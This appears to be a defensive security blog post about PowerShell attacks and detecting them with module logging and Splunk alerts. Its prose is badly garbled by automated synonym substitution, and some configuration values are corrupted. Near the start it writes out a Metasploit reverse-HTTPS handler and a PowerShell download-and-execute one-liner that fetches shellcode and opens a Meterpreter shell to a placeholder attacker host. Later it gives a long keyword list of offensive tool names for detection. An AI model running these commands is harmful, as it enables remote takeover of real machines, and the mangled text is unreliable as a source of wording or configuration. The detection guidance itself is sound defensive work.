-->
Powershell: A Traceless Threat As Well As How To Protect Yourself

Powershell: A Traceless Threat As Well As How To Protect Yourself

Powershell: A Traceless Threat As Well As How To Protect Yourself

For the past times piddling piece I accept been spending fourth dimension learning most PowerShell together with how it tin live on used equally a subtle threat vector inside your network. Influenza A virus subtype H5N1 position out of PowerShell exploitation frameworks accept popped upward late including PowerSploit and Empire, which Greg covered inwards length dorsum inwards September. I, however, wanted to pass some fourth dimension to demonstrate how subtle together with insidious PowerShell tin live on when used equally a threat medium.

As mentioned inwards an before post, according to Verizon's 2013 Data Breach Report 76% of breaches involved stolen or weak credentials, so, to start, this transportation service volition assume that you lot accept already been exploited together with the assailant potentially has admin or domain admin credentials to focus on PowerShell equally a threat vector.

Influenza A virus subtype H5N1 huge give thank you lot you to the operate done past times Ryan Kazanciyan together with Matt Hastings for their research on PowerShell attacks, which was the starting betoken together with principal resources for query on this topic.

Downloading together with Connecting to Metasploit

Once an histrion gains access to a random Windows server inside your surround the showtime activity they volition typically perform is to escalate privileges. PowerSploit has a nifty PowerShell module called Invoke-ShellCode that tin invoke shellcode into a running procedure or fifty-fifty PowerShell itself. So for example, you lot tin laid upward a Kali Linux server amongst a Metasploit server listening on port 443 for incoming shellcode commands:
Metasploit: msf > use exploit/multi/handler msf exploit(handler) > laid PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > laid LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit 
Then you lot tin run the next commands to download together with run the PowerShell Invoke-Shellcode script (default Invoke--Shellcode inwards the Git repositories. That was a wasted hateful solar daytime together with a half.) This volition exercise an HTTPS connectedness dorsum to a C&C Meterpreter shell, or worse:
PowerShell: IEX (New-Object Net.WebClient).DownloadString("https://<Malicious URL>/Invoke-Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https -Lhost <malicious IP> -Lport 443 -Force

Event Logging

Because both the download together with ShellCode connections are via HTTPS most perimeter IPS/AntiVirus volition non inspect them. The ShellCode runs inwards retention together with doesn't striking the disk, leaving it real hard to give away past times both Antiviruses together with classic forensics, but the of import affair to focus on hither is how PowerShell logs these events piece hunting. Executing the higher upward on a Windows 2008 R2 OS amongst PowerShell 2.0 generates alone iii relevant events inwards the Windows PowerShell trial log:
The Windows PowerShell Event Log After Executing ShellCode inwards PowerShell

Leaving basically iii events to acquire by:
400
Engine field is changed from None to Available.
403
Engine field is changed from Available to Stopped.
600
Provider "Certificate" is Started.
WinEventLog:Windows PowerShell
There is null inwards the trial logs most running a script that invokes a ShellCode backdoor to my malicious C&C domain. Can you lot believe Windows Event Logs? Ridiculous. But safety wise this is a serious trouble concern since in that place is no indication of what commands or scripts were run, past times whom, or what actions the scheme took. Running similar scripts such equally Invoke-Mimikatz also produces roughly the same events from inside a PowerShell context.

This is a good known limitation inwards PowerShell 2.0; however, the challenge is that most environments run operating systems that accept PowerShell 2.0 installed past times default default leaving organizations who don't occupation PowerShell having piddling argue to upgrade. This also leaves an active hole inwards an organization's safety posture towards potential threat vectors. You can't empathize what is happening if your scheme won't say you.

PowerShell 3.0 comes amongst many improvements including improved logging, then running the higher upward ascendance on a machine amongst PowerShell 3.0 volition give you lot the same iii events inwards Windows PowerShell, but it volition also give you lot a position out of novel events inwards both Windows-PowerShell/Operational and Windows-WinRM/Operational.

403
PowerShell Console Startup
40961
Engine field is changed from None to Available.
40962
PowerShell console is ready for user input
Microsoft-Windows-PowerShell/Operational

208
The Winrm service is starting
209
The Winrm service started successfully
211
The Winrm service is stopping
212
The Winrm service was stopped successfully
Microsoft-Windows-WinRM/Operational

This is better--we are able to run into that the powershell console was manually started together with that the WinRM service was used inwards some capacity; but in that place is no noesis of what scripts or commands were run or what the results of said commands were. On a side note, piece running Invoke-ShellCode I mistyped the URL together with received an trial log 4100 amongst the fault message "No connectedness could live on made because the target machine actively refused." More on that later, but for at 1 time the overall lack of usable events is frightening together with cannot stand.

PowerShell Module Logging

One selection is to add together logging options to the global PowerShell profile; however, profiles tin live on easily bypassed past times adding the "-NoProfile" flag to your commands. The best option, however, is to enable PowerShell Module Logging inwards your GPO [Edit: PowerShell 3.0+ is required on the system.] To exercise then acquire to to your Group Policy Editor -> Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell:

GPO Windows PowerShell Module Logging Location
The Windows PowerShell department volition listing the Turn on Module Logging section:
Windows PowerShell Module Logging Modules
Select Enabled together with click the Modules Names: Show button:
Windows PowerShell Module Logging Properties
From in that place add together the lines "Microsoft.PowerShell.*" together with "Microsoft.WSMan.Management":

Module Logging for PowerShell together with WSMan
Now, let's endeavor the remote shellcode connectedness again:
Windows Event Log amongst Module Logging
It worked! We tin run into the commands that were executed. It worked... To well. We run into approximately 300 events--one trial for each ascendance executed inwards the Invoke-Shellcode script. Well this is quite troubling. You are going to postulate a SIEM to procedure this type of volume, which nosotros volition occupation Splunk for this scenario.

Setting upward Splunk for PowerShell Events

To input PowerShell events into Splunk, exercise a input.conf amongst the next stanzas:
[WinEventLog://Windows PowerShell] disabled = faux index = wineventlog 
These stanzas volition read events from the Windows PowerShell trial logs, which is where the PowerShell commands are saved. Alternative Windows Events that you lot tin salve for skillful posture are PowerShell Operational, PowerShell Analytic together with WinRM Operational trial logs. Use the next Stanza for each:
[WinEventLog://Microsoft-Windows-PowerShell/Operational] disabled = faux index = wineventlog  [WinEventLog://Microsoft-Windows-PowerShell/Analytic] disabled = faux index = wineventlog  [WinEventLog://Microsoft-Windows-WinRM/Operational] disabled = faux index = wineventlog
So at 1 time that nosotros accept our events into Splunk nosotros postulate a agency to search for malicious events. First, what is a malicious trial inwards PowerShell? I similar to expect for keywords used inwards gfoss' PowerShell Command Line Logging list:
  • Set-ExecutionPolicy
  • Mimikatz
  • EncodedCommand
  • Payload
  • Find-AVSignature
  • DllInjection
  • ReflectivePEInjection
  • Invoke-Shellcode
  • Invoke--Shellcode
  • Invoke-ShellcodeMSIL
  • Get-GPPPassword
  • Get-Keystrokes
  • Get-TimedScreenshot
  • Get-VaultCredential
  • Invoke-CredentialInjection
  • Invoke-NinjaCopy
  • Invoke-TokenManipulation
  • Out-Minidump
  • Set-MasterBootRecord
  • New-ElevatedPersistenceOption
  • Invoke-CallbackIEX
  • Invoke-PSInject
  • Invoke-DllEncode
  • Get-ServiceUnquoted
  • Get-ServiceEXEPerms
  • Get-ServicePerms
  • Invoke-ServiceUserAdd
  • Invoke-ServiceCMD
  • Write-UserAddServiceBinary
  • Write-CMDServiceBinary
  • Write-UserAddMSI
  • Write-ServiceEXE
  • Write-ServiceEXECMD
  • Restore-ServiceEXE
  • Invoke-ServiceStart
  • Invoke-ServiceStop
  • Invoke-ServiceEnable
  • Invoke-ServiceDisable
  • Invoke-FindDLLHijack
  • Invoke-FindPathHijack
  • Get-RegAlwaysInstallElevated
  • Get-RegAutoLogon
  • Get-UnattendedInstallFiles
  • Get-Webconfig
  • Get-ApplicationHost
  • Invoke-AllChecks
  • Invoke-MassCommand
  • Invoke-MassMimikatz
  • Invoke-MassSearch
  • Invoke-MassTemplate
  • Invoke-MassTokens
  • HTTP-Backdoor
  • Add-ScrnSaveBackdoor
  • Gupt-Backdoor
  • Invoke-ADSBackdoor
  • Execute-OnTime
  • DNS_TXT_Pwnage
  • Out-Word
  • Out-Excel
  • Out-Java
  • Out-Shortcut
  • Out-CHM
  • Out-HTA
  • Enable-DuplicateToken 
  • Remove-Update
  • Execute-DNSTXT-Code
  • Download-Execute-PS
  • Execute-Command-MSSQL
  • Download_Execute
  • Get-PassHashes
  • Invoke-CredentialsPhish
  • Get-LsaSecret
  • Get-Information
  • Invoke-MimikatzWDigestDowngrade
  • Copy-VSS
  • Check-VM
  • Invoke-NetworkRelay
  • Create-MultipleSessions
  • Run-EXEonRemote
  • Invoke-BruteForce
  • Port-Scan
  • Invoke-PowerShellIcmp
  • Invoke-PowerShellUdp
  • Invoke-PsGcatAgent
  • Invoke-PoshRatHttps
  • Invoke-PowerShellTcp
  • Invoke-PoshRatHttp
  • Invoke-PowerShellWmi
  • Invoke-PSGcat
  • Remove-PoshRat
  • TexttoEXE
  • Invoke-Encode
  • Invoke-Decode
  • Base64ToString
  • StringtoBase64
  • Do-Exfiltration
  • Parse_Keys
  • Add-Exfiltration
  • Add-Persistence
  • Remove-Persistence
  • Invoke-CreateCertificate
  • powercat
  • Find-PSServiceAccounts
  • Get-PSADForestKRBTGTInfo
  • Discover-PSMSSQLServers
  • Discover-PSMSExchangeServers
  • Get-PSADForestInfo
  • Get-KerberosPolicy
  • Discover-PSInterestingServices
To search this inwards Splunk would live on real expensive equally a regex search, specially if you're putting this into an alert. Two options are to static-code a search of all of the higher upward malicious values, or to exercise a CSV file that Splunk tin occupation equally a lookup for substitution words inwards the search. For example, exercise the CSV BadPowerShellCommands.csv amongst the heading BadPowerShellCommand together with the commands inwards the column underneath together with upload it to your /opt/splunk/etc/system/lookups folder. Now, run the search:
index=wineventlog sourcetype="WinEventLog:Windows PowerShell" [|inputlookup BadPowerShellCommands.csv| rename BadPowerShellCommand equally search | format]
This volition filter your PowerShell consequence laid amongst anything containing a malicious command. Next, inwards the search page, click the Save As push together with salve equally Alert:
Splunk Search amongst Save selection for creating an Alert
Opens the Alert Creation window:
Alert creation screen

Depending on your surround you lot may postulate to play amongst the scenarios that you lot warning on, such equally if your administrators are heavy PowerShell users you lot may desire to whitelist your administrators until off hours/non-change window periods. I would also monitor for the ascendance "Enable-PSRemoting" since this ascendance enables the might to remotely execute PowerShell commands on a local machine. Only administrators amongst a occupation should enable this feature.

Finally, depending on if your surround doesn't occupation PowerShell you lot tin expect for interactive PowerShell commands (or mayhap but during off hours/non-change windows) such equally "Invoke-Command" and "Enter-PSSession".
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser